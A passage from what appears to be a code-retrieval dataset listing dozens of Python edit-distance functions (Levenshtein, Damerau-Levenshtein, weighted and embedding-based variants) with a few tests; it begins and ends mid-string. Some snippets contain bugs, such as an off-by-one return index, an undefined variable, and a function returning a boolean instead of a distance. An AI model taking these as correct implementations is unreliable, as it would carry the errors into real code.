distances[index1+1],\n newDistances[-1])))\n distances = newDistances\n return distances[-1]", "def get_levenshtein_distance(a, b):\r\n n, m = len(a), len(b)\r\n if n > m:\r\n # Make sure n <= m, to use O(min(n,m)) space\r\n a, b = b, a\r\n n, m = m, n\r\n current_row = range(n+1) # Keep current and previous row, not entire matrix\r\n\r\n for i in range(1, m+1):\r\n previous_row, current_row = current_row, [i]+[0]*n\r\n for j in range(1, n+1):\r\n add, delete, change = previous_row[j]+1, current_row[j-1]+1, previous_row[j-1]\r\n if a[j-1] != b[i-1]:\r\n change += 1\r\n current_row[j] = min(add, delete, change)\r\n return current_row[n]", "def word_embedding_levenshtein(seq1, seq2, embeddings, average_distance, r=0.9, normalise=False):\n\tx1 = 1 + len(seq1)\n\tx2 = 1 + len(seq2)\n\n\talpha = r / ((1 - r) * average_distance)\n\n\t# Initialisation of the matrix\n\td = [] # Using Numpy structures for this is probably not more efficient\n\td.append(list(range(x2)))\n\tfor i in range(1, x1):\n\t\td.append([i] * x2)\n\n\t# Core of the algorithm\n\tfor i in range(1, x1):\n\t\tfor j in range(1, x2):\n\t\t\te1 = seq1[i-1]\n\t\t\te2 = seq2[j-1]\n\n\t\t\tif(e1 == e2): c = 0\n\t\t\telse:\n\t\t\t\tv1 = embeddings[e1]\n\t\t\t\tv2 = embeddings[e2]\n\n\t\t\t\tif((v1 is None) or (v2 is None)): c = 1\n\t\t\t\telse:\n\t\t\t\t\tdst = np.linalg.norm(v1 - v2) # Distance 2 (or L2 norm of the difference)\n\n\t\t\t\t\t# Now, we need a function increasing function mapping 0 to 0 and +inf to 1\n\t\t\t\t\tc = 1 - (1 / (1 + (alpha * dst)))\n\n\t\t\t\t\t#c /= r # If you uncomment this line, the cost of a substitution at distance `average_distance` will be 1 and substitutions might have higher cost, up to 1/r. This might be justified as long as `r` is above 0.5 (otherwise, some substitutions might be more expensive than an insertion followed by a deletion).\n\n\t\t\td[i][j] = min(\n\t\t\t\t(d[(i-1)][j] + 1), # Deletion of seq1[i]\n\t\t\t\t(d[i][(j-1)] + 1), # Insertion of seq2[j]\n\t\t\t\t(d[(i-1)][(j-1)] + c) # Substitution from seq1[i] to seq2[j]\n\t\t\t)\n\n\traw = d[-1][-1]\n\n\tif(normalise): return (raw / (len(seq1) + len(seq2)))\n\treturn raw", "def levenshtein_distance(s1,s2):\n\n\t\tif len(s1) < len(s2):\n\t\t\treturn Searcher.levenshtein_distance(s2, s1)\n\n\t\t# len(s1) >= len(s2)\n\t\tif len(s2) == 0:\n\t\t\treturn len(s1)\n\n\t\tprevious_row = range(len(s2) + 1)\n\t\tfor i, c1 in enumerate(s1):\n\t\t\tcurrent_row = [i + 1]\n\t\t\tfor j, c2 in enumerate(s2):\n\t\t\t\tinsertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\n\t\t\t\tdeletions = current_row[j] + 1 # than s2\n\t\t\t\tsubstitutions = previous_row[j] + (c1 != c2)\n\t\t\t\tcurrent_row.append(min(insertions, deletions, substitutions))\n\t\t\tprevious_row = current_row\n\t\t\n\t\treturn previous_row[-1]", "def levenshtein(s1, s2):\n if len(s1) < len(s2):\n return levenshtein(s2, s1)\n\n # len(s1) >= len(s2)\n if len(s2) == 0:\n return len(s1)\n\n previous_row = range(len(s2) + 1)\n for i, c1 in enumerate(s1):\n current_row = [i + 1]\n for j, c2 in enumerate(s2):\n insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\n deletions = current_row[j] + 1 # than s2\n substitutions = previous_row[j] + (c1 != c2)\n current_row.append(min(insertions, deletions, substitutions))\n previous_row = current_row\n \n return previous_row[-1]", "def compute_backpointers(s0, s1): #Tillverkar en array med backpointrs\r\n if s0 == None or s1 == None:\r\n raise Exception('Both s0 and s1 have to be set')\r\n rows = len(s0)+1 # antalet rader\r\n columns = len(s1)+1 # antalet kolumner\r\n\r\n ####### Tillverkar Levenshtein matrisen ########\r\n # Gör en tom matris med nollor\r\n distance = [[0 for y in range(len(s1)+1)] for x in range(len(s0)+1)]\r\n\r\n # Gör de yttre lagrerna i matrisen 0 -> len(str) vertikalt och horisontellt\r\n for i in range(1,rows):\r\n distance[i][0] = i\r\n for i in range(1,columns):\r\n distance[0][i] = i\r\n\r\n # Beräknar kostnaderna för varje plats inne i matrisen och sätter in dem\r\n # kollar om bokstaven på indexet i de två orden är samma i sådana fall kostar det 0\r\n # och skall ha samma värde som diagonalt innan, annars kostar det 1 från över eller underself.\r\n for column in range(1,columns):\r\n for row in range(1,rows): # kolla varje rad i vare column\r\n if s0[row-1] == s1[column -1]: # om det är samma bokstav kostar det 0\r\n c = 0\r\n else: # annars kostar det 2\r\n c = 2\r\n distance[row][column] = min(distance[row-1][column] + 1,distance[row][column-1] + 1,distance[row-1][column-1] + c)\r\n # raden över säger att det minsta värdet av över eller bredvid + 1 eller diagonalt innan plus (0 eller 2)\r\n # skall sättas in på platsen i matrisen.\r\n\r\n # det minsta avståndet är\r\n cost = distance[row][column]\r\n print(\"totalkostnaden är\")\r\n print(cost)\r\n\r\n\r\n ####### Tillverkar backptr-matrisen ########\r\n # Tillverkar en tom matris med [0,0] för till backptr-matrisen\r\n backptr = [[[0, 0] for y in range(len(s1)+1)] for x in range(len(s0)+1)]\r\n\r\n # går igenom platserna i Levenshtein matrisen bakirfrån\r\n for column in range(columns-1,0,-1):\r\n for row in range(rows-1,0,-1):\r\n # Om värdet till vänster är det minsta: peka vänster\r\n if distance[row][column-1] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row\r\n backptr[row][column][1] = column -1\r\n # Om värdet över är det minsta: peka upp\r\n if distance[row-1][column] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row -1\r\n backptr[row][column][1] = column\r\n # om värdet diagonalt är minst: peka på diagonalt\r\n if distance[row-1][column-1] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row-1\r\n backptr[row][column][1] = column -1\r\n\r\n # Gör yttervärdena i matrisen, (OBS behövs ej)\r\n for i in range(0,rows):\r\n j = i-1\r\n backptr[i][0][0] = j\r\n backptr[i][0][1] = 0\r\n for i in range(0,columns):\r\n j = i-1\r\n backptr[0][i][1] = j\r\n backptr[0][i][0] = 0\r\n\r\n return backptr", "def levenshtein_distance(first, second):\n if len(first) > len(second):\n first, second = second, first\n if len(second) == 0:\n return len(first)\n first_length = len(first) + 1\n second_length = len(second) + 1\n distance_matrix = [range(second_length) for x in range(first_length)]\n for i in range(1, first_length):\n for j in range(1, second_length):\n deletion = distance_matrix[i-1][j] + 1\n insertion = distance_matrix[i][j-1] + 1\n substitution = distance_matrix[i-1][j-1]\n if first[i-1] != second[j-1]:\n substitution += 1\n distance_matrix[i][j] = min(insertion, deletion, substitution)\n\n return distance_matrix[first_length-1][second_length-1]", "def find_edit_distance(string1,string2):\n M=zeros((len(string1)+1,len(string2)+1), dtype=int)\n for i in xrange(1,len(string1)+1):\n M[i][0]=i\n for j in xrange(1,len(string2)+1):\n M[0][j]=j\n for i in xrange(1,len(string1)+1):\n for j in xrange(1,len(string2)+1):\n if(string1[i-1]!=string2[j-1]):\n M[i][j] = min(M[i - 1][j] + 1, M[i][j - 1] + 1, M[i - 1][j - 1] + 1)\n else:\n M[i][j] = M[i - 1][j - 1]\n return M[len(string1)][len(string2)]", "def iterative_levenshtein(self, w1, d1, w2, d2):\n rows = len(w1) + 1\n cols = len(w2) + 1\n dist = [[0 for x in range(cols)] for x in range(rows)]\n # source prefixes can be transformed into empty strings\n # by deletions:\n for i in range(1, rows):\n dist[i][0] = i\n # target prefixes can be created from an empty source string\n # by inserting the characters\n for i in range(1, cols):\n dist[0][i] = i\n\n for col in range(1, cols):\n for row in range(1, rows):\n if w1[row - 1] == w2[col - 1]:\n cost = 0\n else:\n cost = 1\n dist[row][col] = min(dist[row - 1][col] + 1, # deletion\n dist[row][col - 1] + 1, # insertion\n dist[row - 1][col - 1] + cost) # substitution\n return dist[row][col] < 5", "def levenshtein(seq1: str, seq2: str) -> int:\n if seq1 == \"\":\n return len(seq2)\n if seq2 == \"\":\n return len(seq1)\n if seq1[-1] == seq2[-1]:\n cost = 0\n else:\n cost = 1\n \n result = min([levenshtein(seq1[:-1], seq2) + 1,\n levenshtein(seq1, seq2[:-1]) + 1,\n levenshtein(seq1[:-1], seq2[:-1]) + cost ])\n return result", "def levenshtein_similarity(self, top, rows):\n if len(rows) > 1:\n return (\n [(1 - editdistance.eval(top, rows[i]) / max(len(top), len(rows[i]))) for i in\n range(0, len(rows))])\n else:\n return 1", "def damerau_levenshtein_distance(comp_sec):\n s1 = comp_sec['log_trace']\n s2 = comp_sec['sim_trace']\n p1 = comp_sec['proc_log_trace']\n p2 = comp_sec['proc_sim_trace']\n w1 = comp_sec['wait_log_trace']\n w2 = comp_sec['wait_sim_trace']\n d = {}\n lenstr1 = len(s1)\n lenstr2 = len(s2)\n for i in range(-1,lenstr1+1):\n d[(i,-1)] = i+1\n for j in range(-1,lenstr2+1):\n d[(-1,j)] = j+1\n for i in range(0, lenstr1):\n for j in range(0, lenstr2):\n if s1[i] == s2[j]:\n t1 = p1[i] + w1[i]\n if t1 > 0:\n b1 = (p1[i]/t1)\n b2 = (w1[i]/t1)\n cost = (b1*abs(p2[j]-p1[i])) + (b2*abs(w2[j]-w1[i]))\n else:\n cost = 0\n else:\n cost = 1\n d[(i,j)] = min(\n d[(i-1,j)] + 1, # deletion\n d[(i,j-1)] + 1, # insertion\n d[(i-1,j-1)] + cost, # substitution\n )\n if i and j and s1[i]==s2[j-1] and s1[i-1] == s2[j]:\n d[(i,j)] = min (d[(i,j)], d[i-2,j-2] + cost) # transposition\n return d[lenstr1-1,lenstr2-1]", "def edit_distance(left, right):\n similarities = np.zeros((len(left) + 1, len(right) + 1), dtype=np.int32)\n similarities[:, 0] = range(len(left) + 1)\n similarities[0, :] = range(len(right) + 1)\n\n for l in range(1, len(left) + 1):\n for r in range(1, len(right) + 1):\n sub_cost = 0 if left[l - 1] == right[r - 1] else 1\n similarities[l][r] = min(similarities[l - 1][r] + 1,\n similarities[l][r - 1] + 1,\n similarities[l - 1][r - 1] + sub_cost)\n return similarities[len(left), len(right)]", "def distance_matrix(sequences, substitution_mat):\n distance_mat = numpy.empty((len(sequences), len(sequences)), dtype='float')\n\n print(\"Building distance matrix\")\n # Get similarity score\n for i, seqA in enumerate(sequences):\n sys.stdout.write(\"\\r%.f%%\" % (float(i+1)/len(sequences)*100))\n sys.stdout.flush()\n for j, seqB in enumerate(sequences[i:], start=i):\n score = substitution_score(substitution_mat, seqA, seqB)\n distance_mat[i, j] = score\n distance_mat[j, i] = score\n print(\"\")\n # Set equal the diagonal\n diag_mini = numpy.min(distance_mat.diagonal())\n for i in range(len(sequences)):\n distance_mat[i, i] = diag_mini\n # Convert similarity score into a distance\n mini = numpy.min(distance_mat)\n maxi = numpy.max(distance_mat)\n return 1 - (distance_mat + abs(mini))/(maxi - mini)", "def nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True):\n\n return _nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix, dist_weight, gap_penalty, ntrim, ctrim, fixed_gappos)", "def _levenshtein_distance(t1: Trace, t2: Trace):\n if t1.length > t2.length:\n t1, t2 = t2, t1\n\n distances = range(t1.length + 1)\n for i2, c2 in enumerate(t2.event_list):\n distances_ = [i2 + 1]\n for i1, c1 in enumerate(t1.event_list):\n if c1 == c2:\n distances_.append(distances[i1])\n else:\n distances_.append(1 + min((distances[i1], distances[i1 + 1], distances_[-1])))\n distances = distances_\n return distances[-1]", "def leveinshtein_distance(source,target):\r\n\t#Step 1\r\n\ts_len=len(source)\r\n\tt_len=len(target)\r\n\tcost=0\r\n\tif(s_len==0):\r\n\t\treturn t_len\r\n\tif(t_len==0):\r\n\t\treturn s_len\r\n\tprint(\"Dimensions:\\n\\tN:%d\\n\\tM:%d\"%(s_len,t_len))\r\n\t#Step 2\r\n\tmatrix=[[0 for _ in range(0,t_len+1)] for _ in range(0, s_len+1)]\r\n\t#Initialize first row 0..s_len\r\n\tfor idx in range(0,s_len+1):\r\n\t\tmatrix[idx][0]=idx\r\n\t#Initialize the first column 0..t_len\r\n\tfor idx in range(0, t_len+1):\r\n\t\tmatrix[0][idx]=idx\r\n\tprint(\"===Original===\")\r\n\tprint_matrix(matrix,source,target)\r\n\t#Step 3\r\n\tfor i in range(1,s_len+1):\r\n\t\tch=source[i-1]\r\n\t\t#print(ch)\r\n\t\t#Step 4\r\n\t\tfor j in range(1,t_len+1):\r\n\t\t\t#print(\">%s\"%target[j-1])\r\n\t\t\t#Step 5\r\n\t\t\tif ch==target[j-1]:\r\n\t\t\t\tcost=0\r\n\t\t\telse:\r\n\t\t\t\tcost=1\r\n\t\t\t#Step 6\r\n\t\t\t\r\n\t\t\t#print(\"(i,j)=>(%d,%d)\"%(i,j))\r\n\t\t\t#print(matrix[i][j])\r\n\t\t\tmatrix[i][j]=minimum(\r\n\t\t\t\tmatrix[i-1][j]+1,\r\n\t\t\t\tmatrix[i][j-1]+1,\r\n\t\t\t\tmatrix[i-1][j-1]+cost\r\n\t\t\t)\r\n\tprint(\"===Final Matrix===\")\r\n\tprint_matrix(matrix,source,target)\r\n\treturn matrix[s_len-1][t_len-1]", "def damerau_levenshtein_distance(s1, s2):\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n # s1 = utils.unicode_normalize(s1)\n # s2 = utils.unicode_normalize(s2)\n\n n1, n2 = len(s1), len(s2)\n infinite = n1 + n2\n\n char_arr = defaultdict(int)\n dp = [[0] * (n2 + 2) for _ in range(n1 + 2)]\n\n dp[0][0] = infinite\n for i in range(0, n1 + 1):\n dp[i + 1][0] = infinite\n dp[i + 1][1] = i\n for i in range(0, n2 + 1):\n dp[0][i + 1] = infinite\n dp[1][i + 1] = i\n\n for i in range(1, n1 + 1):\n db = 0\n for j in range(1, n2 + 1):\n i1 = char_arr[s2[j - 1]]\n j1 = db\n cost = 1\n if s1[i - 1] == s2[j - 1]:\n cost = 0\n db = j\n\n dp[i + 1][j + 1] = min(dp[i][j] + cost,\n dp[i + 1][j] + 1,\n dp[i][j + 1] + 1,\n dp[i1][j1] + (i - i1 - 1) + 1 + (j - j1 - 1))\n char_arr[s1[i - 1]] = i\n\n return dp[n1 + 1][n2 + 1]", "def edit_distance(s1: str, s2: str) -> int:\n # dp[a][b] is the edit distance between s1[:a] and s2[:b]\n dp = [[0 for _ in range(len(s2) + 1)] for _ in range(len(s1) + 1)]\n\n for i in range(len(s1) + 1):\n for j in range(len(s2) + 1):\n dp[i][j] = 0\n\n for i in range(len(s1) + 1):\n for j in range(len(s2) + 1):\n # The two base cases: the empty string compared to another string\n # alway has the edit distance of the length of the other string,\n # because you just insert all of the characters from the other\n # string\n if i == 0:\n dp[i][j] = j\n elif j == 0:\n dp[i][j] = i\n # If the characters are equal, we don't add anything to the edit\n # distance\n elif s1[i - 1] == s2[j - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n # We have 3 cases when the characters aren't equal: we have an\n # insertion, a deletion, or a substitution.\n else:\n dp[i][j] = min(dp[i - 1][j], dp[i][j - 1],\n dp[i - 1][j - 1]) + 1\n print(dp)\n return dp[-1][-1]", "def string_edit_dist(str1, str2):\n sm = edit_distance.SequenceMatcher(a=str1, b=str2)\n return sm.distance()", "def weighted_levenshtein(seq1, seq2, weights, r=0.9, normalise=False):\n\tx1 = 1 + len(seq1)\n\tx2 = 1 + len(seq2)\n\n\talpha = r / ((1 - r) * average_distance)\n\n\t# Initialisation of the matrix\n\td = [] # Using Numpy structures for this is probably not more efficient\n\ttmp = 0.0\n\tfirst_line = [tmp]\n\tfor e in seq2:\n\t\ttmp += weights.get(e, 1)\n\t\tfirst_line.append(tmp)\n\td.append(first_line)\n\ttmp = 0\n\tfor e in seq1:\n\t\ttmp += weights.get(e, 1)\n\t\td.append([tmp] * x2)\n\n\t# Core of the algorithm\n\tfor i in range(1, x1):\n\t\tfor j in range(1, x2):\n\t\t\te1 = seq1[i-1]\n\t\t\te2 = seq2[j-1]\n\n\t\t\tw1 = weights.get(e1, 1)\n\t\t\tw2 = weights.get(e2, 1)\n\n\t\t\td[i][j] = min(\n\t\t\t\t(d[(i-1)][j] + w1), # Deletion of seq1[i]\n\t\t\t\t(d[i][(j-1)] + w2), # Insertion of seq2[j]\n\t\t\t\t(d[(i-1)][(j-1)] + (int(e1 != e2) * max(w1, w2))) # Substitution from seq1[i] to seq2[j]\n\t\t\t)\n\n\traw = d[-1][-1]\n\n\tif(normalise): return (raw / (d[0][-1] + d[-1][0]))\n\treturn raw", "def question7(seq_x, seq_y):\n \n diag_score = 2\n off_diag_score = 1\n dash_score = 0\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n score_matrix = student.build_scoring_matrix(alphabet, diag_score, off_diag_score, dash_score)\n \n align_matrix = student.compute_alignment_matrix(seq_x, seq_y, score_matrix, True)\n score, align_x, align_y = student.compute_global_alignment(seq_x, seq_y, score_matrix, align_matrix)\n \n edit_distance = len(seq_x) + len(seq_y) - score\n \n print \"Edit distance: \" + str(edit_distance)\n print align_x\n print align_y", "def edit_distance_dp(str_1, m, str_2, n):\n # table for storing sub-problems\n sub = [[0 for i in range(n + 1)] for j in range(m + 1)] # padded for empty cases\n\n # fill table\n for i in range(m + 1):\n for j in range(n + 1):\n if i == 0:\n # str_1 is empty, or we have not selected any substring of it\n sub[i][j] = j # the difference is all of str_2, equivalent to len(str_2) = j removals\n elif j == 0:\n # str_2 is empty, or we have not selected any substring of it\n sub[i][j] = i # the difference is all of str_1, equivalent to len(str_1_ = i removals\n elif str_1[i - 1] == str_2[j - 1]:\n # last chars are equal, so no edits needed; continue for sub-problems\n sub[i][j] = sub[i - 1][j - 1]\n else:\n # last chars are not equal, solve for all 3 subproblems\n insert_char = sub[i][j - 1]\n remove_char = sub[i - 1][j]\n replace_char = sub[i - 1][j - 1]\n sub[i][j] = 1 + min(insert_char, remove_char, replace_char)\n\n return sub[m][n] # solution lies in last cell", "def __levenshtein(a, b):\n\n n, m = len(a), len(b)\n if n > m:\n # Make sure n <= m, to use O(min(n,m)) space\n a, b = b, a\n n, m = m, n\n\n current = list(range(n + 1))\n for i in range(1, m + 1):\n previous, current = current, [i] + [0] * n\n for j in range(1, n + 1):\n add, delete = previous[j] + 1, current[j - 1] + 1\n change = previous[j - 1]\n if a[j - 1] != b[i - 1]:\n change = change + 1\n current[j] = min(add, delete, change)\n\n return current[n]", "def levenshtein_distance(s: Union[bytes, str], t: Union[bytes, str]) -> int:\n if s is None or t is None:\n raise ValueError(\"Strings must not be None\")\n\n n = len(s)\n m = len(t)\n\n if n == 0:\n return m\n elif m == 0:\n return n\n\n if n > m:\n tmp = s\n s = t\n t = tmp\n n = m\n m = len(t)\n\n p = [0] * (n + 1)\n d = [0] * (n + 1)\n\n for i in range(0, n + 1):\n p[i] = i\n\n for j in range(1, m + 1):\n if DEBUG_DISTANCE:\n if j % 100 == 0:\n print(\"DEBUG:\", int(j / (m + 1.0) * 100), \"%\\r\", end=' ', file=sys.stderr)\n t_j = t[j - 1]\n d[0] = j\n\n for i in range(1, n + 1):\n cost = 0 if s[i - 1] == t_j else 1\n # minimum of cell to the left+1, to the top+1, diagonally left and up +cost\n d[i] = min(min(d[i - 1] + 1, p[i] + 1), p[i - 1] + cost)\n\n _d = p\n p = d\n d = _d\n\n if DEBUG_DISTANCE:\n print(\"\\n\", file=sys.stderr)\n return p[n]", "def levenshtein(source, target):\n if len(source) < len(target):\n return levenshtein(target, source)\n\n # So now we have len(source) >= len(target).\n if len(target) == 0:\n return len(source)\n\n # We call tuple() to force strings to be used as sequences\n # ('c', 'a', 't', 's') - numpy uses them as values by default.\n source = np.array(tuple(source))\n target = np.array(tuple(target))\n\n # We use a dynamic programming algorithm, but with the\n # added optimization that we only need the last two rows\n # of the matrix.\n previous_row = np.arange(target.size + 1)\n for s in source:\n # Insertion (target grows longer than source):\n current_row = previous_row + 1\n\n # Substitution or matching:\n # Target and source items are aligned, and either\n # are different (cost of 1), or are the same (cost of 0).\n current_row[1:] = np.minimum(\n current_row[1:],\n np.add(previous_row[:-1], target != s))\n\n # Deletion (target grows shorter than source):\n current_row[1:] = np.minimum(\n current_row[1:],\n current_row[0:-1] + 1)\n\n previous_row = current_row\n\n return previous_row[-1]", "def test_matrix_distance(self):\n # note that the score matrix must contain 'diagonal' elements m[i][i]\n # to avoid failure when the sequences match.\n m = {\"U\": {\"U\": 0, \"C\": 1, \"A\": 5}, \"C\": {\"C\": 0, \"A\": 2, \"G\": 4}}\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"UCACGG\", m), 14)\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"\", m), 0)\n self.assertEqual(self.RNA(\"UUU\").matrix_distance(\"CAC\", m), 7)\n self.assertRaises(KeyError, self.RNA(\"UUU\").matrix_distance, \"CAG\", m)", "def _edit_distance(prediction_tokens: List[str], reference_tokens: List[str]) ->int:\n dp = [([0] * (len(reference_tokens) + 1)) for _ in range(len(prediction_tokens) + 1)]\n for i in range(len(prediction_tokens) + 1):\n dp[i][0] = i\n for j in range(len(reference_tokens) + 1):\n dp[0][j] = j\n for i in range(1, len(prediction_tokens) + 1):\n for j in range(1, len(reference_tokens) + 1):\n if prediction_tokens[i - 1] == reference_tokens[j - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n else:\n dp[i][j] = min(dp[i - 1][j], dp[i][j - 1], dp[i - 1][j - 1]) + 1\n return dp[-1][-1]", "def levenshtein_dist(s1, s2, dele, add, sub):\n m = np.zeros((len(s1)+1, len(s2)+1), dtype=np.int)\n p = np.zeros((len(s1)+1, len(s2)+1), dtype=np.float)\n for i in range(len(s1)+1):\n m[i, 0] = i\n # compute probability for deletion\n if i == 0:\n p[i, 0] = 1\n else:\n ind = alphabet.index('@')\n p[i, 0] = p[i-1, 0] * dele[ind, alphabet.index(s1[i-1])]\n for j in range(len(s2)+1):\n # compute probability for insertion\n if j == 0:\n p[0, j] = 1\n else:\n prev_char = '@' if j == 1 else s2[j-2]\n p[0, j] = p[0, j-1] * add[alphabet.index(prev_char),\n alphabet.index(s2[j-1])]\n m[0, j] = j\n for i in range(1, 1+len(s1)):\n for j in range(1, len(s2)+1):\n if s1[i-1] == s2[j-1]:\n k = np.argmin([m[i-1, j] + 1, m[i, j-1] + 1, m[i-1, j-1]])\n if k == 0:\n # deletion\n m[i, j] = m[i-1, j] + 1\n prev_char = '@' if j == 1 else s2[j-2]\n p[i, j] = p[i-1, j] * dele[alphabet.index(prev_char), alphabet.index(s1[i-1])]\n elif k == 1:\n # insertion\n m[i, j] = m[i, j-1] + 1\n prev_char = '@' if j == 1 else s2[j-2]\n p[i, j] = p[i, j-1] * add[alphabet.index(prev_char), alphabet.index(s2[j-1])]\n else:\n # no mistake\n m[i, j] = m[i-1, j-1]\n p[i, j] = p[i-1, j-1]\n else:\n k = np.argmin([m[i-1, j] + 1, m[i, j-1] + 1, m[i-1, j-1] + 1])\n if k == 0:\n # deletion\n m[i, j] = m[i-1, j] + 1\n prev_char = '@' if j == 1 else s2[j-2]\n p[i, j] = p[i-1, j] * dele[alphabet.index(prev_char), alphabet.index(s1[i-1])]\n elif k == 1:\n # insertion\n m[i, j] = m[i, j-1] + 1\n prev_char = '@' if j == 1 else s2[j-2]\n p[i, j] = p[i, j-1] * add[alphabet.index(prev_char), alphabet.index(s2[j-1])]\n else:\n # substitution\n m[i, j] = m[i-1, j-1] + 1\n p[i, j] = p[i-1, j-1] * sub[alphabet.index(s1[i-1]), alphabet.index(s2[j-1])]\n # recall that in sub[X, Y], Y is the correct word\n\n return m[len(s1), len(s2)], p[len(s1), len(s2)]", "def test_distance_indices(self):\n s1 = self.RNA(\"AUGC\")\n s2 = self.RNA(\"AAGC\")\n\n def f(x, y):\n if x == 2 or y == 2:\n return 10\n return 0\n\n self.assertEqual(s1.distance(s2, f, use_indices=True), 20)", "def distances(a, b):\n # generating matrix\n matrix = [[(0, None) for x in range(len(b) + 1)] for y in range(len(a) + 1)]\n\n # base case\n for i in range(1, len(a) + 1):\n matrix[i][0] = (i, Operation.DELETED)\n for j in range(1, len(b) + 1):\n matrix[0][j] = (j, Operation.INSERTED)\n\n # fill in matrix with tuples (cost, operation)\n for i in range(1, len(a) + 1):\n for j in range(1, len(b) + 1):\n # edit distance algorithm\n # costs for deletion, insertion and substitution\n delete_cost = matrix[i - 1][j][0] + 1\n insert_cost = matrix[i][j - 1][0] + 1\n substitute_cost = matrix[i - 1][j - 1][0]\n if a[i - 1] != b[j - 1]:\n substitute_cost += 1\n\n # edit distance is min cost of deletion, insertion, substitution\n if delete_cost < insert_cost and delete_cost < substitute_cost:\n matrix[i][j] = (delete_cost, Operation.DELETED)\n elif insert_cost < substitute_cost:\n matrix[i][j] = (insert_cost, Operation.INSERTED)\n else:\n matrix[i][j] = (substitute_cost, Operation.SUBSTITUTED)\n\n return matrix", "def find_ld(s, t, c=(1, 1, 1)):\n\n # output string templates\n pos_str = \"Position: row={} col={}\"\n let_str = \"Letters: {} -> {}\"\n op_str = \"Operation: {}, Cost: {}\"\n cst_str = \" {} ({},{}) cost: {} value: {}\"\n\n # keep the shape of the matrix consistent. The algorithm is symmetric\n if len(s) < len(t):\n return find_ld(t, s)\n\n # null inputs\n if len(t) == 0:\n return len(s), []\n\n rows = len(s) + 1\n cols = len(t) + 1\n row = rows\n col = cols\n\n # get costs from input tuple\n d_cost, i_cost, s_cost = c\n\n # setup blank matrices to hold distances and operations\n dist = [[0 for x in range(cols)] for x in range(rows)]\n\n # setup delete costs\n for row in range(1, rows):\n dist[row][0] = row * d_cost\n\n # setup insert costs\n for col in range(1, cols):\n dist[0][col] = col * i_cost\n\n # print initial matrix\n if verbose == 2:\n print()\n print(\"Initial Matrix:\")\n print_matrix(s, t, dist)\n\n for col in range(1, cols):\n for row in range(1, rows):\n\n if verbose == 2:\n print(pos_str.format(str(row), str(col)))\n print(let_str.format(str(s[row - 1]), str(t[col - 1])))\n\n # determine costs\n del_cost = dist[row - 1][col] + d_cost\n if verbose == 2:\n print(cst_str.format(\"delete\", str(row - 1), str(col), str(d_cost), str(del_cost)))\n\n ins_cost = dist[row][col - 1] + i_cost\n if verbose == 2:\n print(cst_str.format(\"insert\", str(row), str(col - 1), str(i_cost), str(ins_cost)))\n\n # sub cost could be 0 if letters are the same\n if s[row - 1] == t[col - 1]:\n sub_cost = dist[row - 1][col - 1] + 0\n if verbose == 2:\n print(cst_str.format(\"substitute (no change)\", str(row - 1), str(col - 1), \"0\", str(sub_cost)))\n else:\n sub_cost = dist[row - 1][col - 1] + s_cost\n if verbose == 2:\n print(cst_str.format(\"substitute\", str(row - 1), str(col - 1), str(s_cost), str(sub_cost)))\n\n # determine least costly operation\n if del_cost == min(del_cost, ins_cost, sub_cost):\n dist[row][col] = del_cost\n if verbose == 2:\n print(op_str.format('delete', del_cost))\n\n elif ins_cost == min(del_cost, ins_cost, sub_cost):\n dist[row][col] = ins_cost\n if verbose == 2:\n print(op_str.format('insert', ins_cost))\n\n else:\n # sub_cost == min(del_cost, ins_cost, sub_cost):\n dist[row][col] = sub_cost\n if verbose == 2:\n print(op_str.format('substitute', sub_cost))\n\n # print matrix every iteration is verbose output is on\n if verbose == 2:\n print()\n print_matrix(s, t, dist)\n\n return dist[row][col], dist", "def levenshtein(proposed, gold, normalize=False):\n lev_densities = []\n for x, y in zip(proposed, gold):\n score = editdistance.eval(x, y)\n if normalize:\n score /= len(y)\n lev_densities.append(score)\n return sum(lev_densities) / len(lev_densities)", "def levenshtein_distance(s, t, alphabet=string.printable, **weight_dict):\n if len(s) == 0 or len(t) == 0:\n return max([len(s), len(t)])\n\n rows = len(s) + 1\n cols = len(t) + 1\n\n w = dict((x, (1, 1, 1)) for x in alphabet + alphabet.upper())\n if weight_dict:\n w.update(weight_dict)\n\n dist = [[0 for _ in range(cols)] for _ in range(rows)]\n # source prefixes can be transformed into empty strings\n # by deletions:\n for row in range(1, rows):\n dist[row][0] = dist[row - 1][0] + w[s[row - 1]][0]\n # target prefixes can be created from an empty source string\n # by inserting the characters\n for col in range(1, cols):\n dist[0][col] = dist[0][col - 1] + w[t[col - 1]][1]\n\n for col in range(1, cols):\n for row in range(1, rows):\n deletes = w[s[row - 1]][0]\n inserts = w[t[col - 1]][1]\n subs = max((w[s[row - 1]][2], w[t[col - 1]][2]))\n if s[row - 1] == t[col - 1]:\n subs = 0\n else:\n subs = subs\n dist[row][col] = min(\n dist[row - 1][col] + deletes,\n dist[row][col - 1] + inserts,\n dist[row - 1][col - 1] + subs,\n ) # substitution\n\n return dist[row][col]", "def editDistance(l1, l2):\n cache = [[None for i in range(len(l2) + 1)] for j in range(len(l1) + 1)]\n \n for row in range(len(l1) + 1):\n for col in range(len(l2) + 1):\n if row == 0 and col == 0:\n cache[row][col] = 0\n elif col == 0:\n cache[row][col] = row\n elif row == 0:\n cache[row][col] = col\n elif l1[row - 1] == l2[col - 1]:\n cache[row][col] = cache[row - 1][col - 1]\n else:\n a = cache[row - 1][col]\n b = cache[row][col - 1]\n c = cache[row - 1][col - 1]\n cache[row][col] = min(a, b, c) + 1\n\n return findResult(l1, l2, cache)", "def _edit_dist(s1, s2):\r\n dist = 0\r\n for i in range(len(s1)):\r\n if s1[i] != s2[i]:\r\n dist += 1\r\n return dist", "def hard_example_mining(dist_mat, labels, return_inds=False):\n assert len(dist_mat.size()) == 2\n assert 